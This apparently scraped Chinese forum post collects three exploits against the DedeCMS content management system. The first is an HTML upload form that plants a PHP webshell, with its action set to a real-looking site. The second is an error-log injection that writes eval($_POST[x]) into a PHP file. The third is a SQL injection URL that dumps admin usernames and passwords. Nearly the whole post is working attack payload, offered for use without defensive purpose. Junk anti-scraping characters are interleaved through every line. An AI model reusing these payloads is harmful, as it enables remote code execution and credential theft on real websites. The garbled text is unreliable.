5 k! `4 x: h6 [2 B& k3 h$ K  U+ I+ I$ R! w' y" S* h
0 ^* a% A. V. {, L' U; p& b

/ L; f, o4 C6 i6 w: G9 \
) _) r) p0 P3 T! X4 W2 i# A4 B
, T: N- o* h& k$ I+ E  p织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
5 q& X9 G1 s  y+ @7 F. ]2 e% [# y<html>
% F) w- H8 a5 j$ r# Q) U: E<head>, V  I8 T& o9 S! `( H# l9 ?; B3 B# M6 F
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title># v' h' y* u) F' h( W0 @
</head>
+ A/ {" J0 W  ?- M3 }* C1 ^' F% S<body style="FONT-SIZE: 9pt">
5 l- \1 q, ]7 c) H) b/ P---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
8 ?! K0 A6 ~( h0 K1 p1 P: l<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>5 K, J! N2 V8 ]
<input type='hidden' name='activepath' value='/data/cache/' />
2 [3 x; ?! I! s* F; K<input type='hidden' name='cfg_basedir' value='../../' />/ S, Z9 M/ d  N3 @, s9 y
<input type='hidden' name='cfg_imgtype' value='php' />: ~" |; a& W3 w& i$ L
<input type='hidden' name='cfg_not_allowall' value='txt' />$ O; X& x$ b# L) b3 F3 w
<input type='hidden' name='cfg_softtype' value='php' />+ z5 G) t3 U$ d. S6 L6 l
<input type='hidden' name='cfg_mediatype' value='php' />& @( D6 w: V. ], I  D
<input type='hidden' name='f' value='form1.enclosure' />
! S7 |$ Q, A9 H4 X, ?! A" _$ H<input type='hidden' name='job' value='upload' />
' S, F/ H+ f" u) L<input type='hidden' name='newname' value='fly.php' />
1 J3 ?2 q( R2 e# a/ b- YSelect U Shell <input type='file' name='uploadfile' size='25' />% U* E9 Y* u9 z* i2 E
<input type='submit' name='sb1' value='确定' />
; r5 q  V' c: ~$ u</form>
$ X8 e) ]! i7 `9 E) x5 s<br />It's just a exp for the bug of Dedecms V55...<br />
- f! c( K% Q& }) H" INeed register_globals = on...<br />
1 H8 Y. C3 M+ M* P1 U- \Fun the game,get a webshell at /data/cache/fly.php...<br />
1 h% z% B* G3 l- J</body>
5 D0 N* f7 l. q9 r" B</html>0 o; c$ q' ^! E" P3 D7 `

4 F+ R4 P- a+ l$ d- b6 a; H; L$ D0 u1 M- C  x8 S
& e, s# v* i. e- I- Z
" K2 A2 \- H7 E# ?
6 X' @- t" @  E1 _+ O- f+ p
+ @# G  l& v8 @6 S1 ?9 q

: \  c3 K- E, c/ ~* X' ?
' Y! F. t5 n6 v' x% `' W4 L
# g* N, |& J$ d0 d
" y6 I( r% R4 F. K- H' g$ H+ i* d织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞( h$ t8 t& {7 r! A0 d
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。7 e; f5 N% r5 S' ]1 q
1. 访问网址:9 \! L' b% q' \+ i3 O, w% E
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>9 j! t& `) g! P" a" `; M" r
可看见错误信息
/ x1 ?1 |7 f. c5 L: h* v$ `; r+ I' U# R* v; J& J, n, a1 D
, G: ~3 }0 s; {- a7 u
2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。4 p  O( E6 b# J. w" `0 u) a4 V
int(3) Error: Illegal double '1024e1024' value found during parsing5 H! Q/ Z* D$ W% J) f" i
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
# k2 w* i9 |0 M. }* ~8 P' U1 X# c: N2 ]
% P$ h3 a4 M" k0 k
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
7 n3 v& f; ]  V2 J: w4 e* F7 }" S. B2 I: D+ x4 k( @

+ R/ s6 h" T% Y9 @7 \, ^4 w<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
3 G! \5 j" t* B) N# X+ }8 Z4 W" f2 P# f  N- M- A
. s8 ^, I5 X, b: l4 I# h, f: m
按确定后的看到第2步骤的信息表示文件木马上传成功.
% l8 X# N& ~/ s7 L( w
7 U) |3 Y: A9 f9 P1 i5 U
/ |3 e+ M4 K3 y/ |# C# E7 o& i2 _: g% Q5 K  T3 y1 r

7 l) \! E7 P7 L- u* j- {% y+ N0 N; ^& s3 N. m2 K  b
# U6 j2 D. Q) |. E: w- b( T0 v
4 x+ _3 @$ @8 \" v
8 h$ L; r4 o6 e5 X" T

& s  }  Y( i" u0 T$ g  J  i0 P6 k
; Q5 p# j3 u; o- U3 Q) N
) ?* i, T; y7 a- ], s. ?1 `
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
. A4 @- j* Q) ]: E$ V) rhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表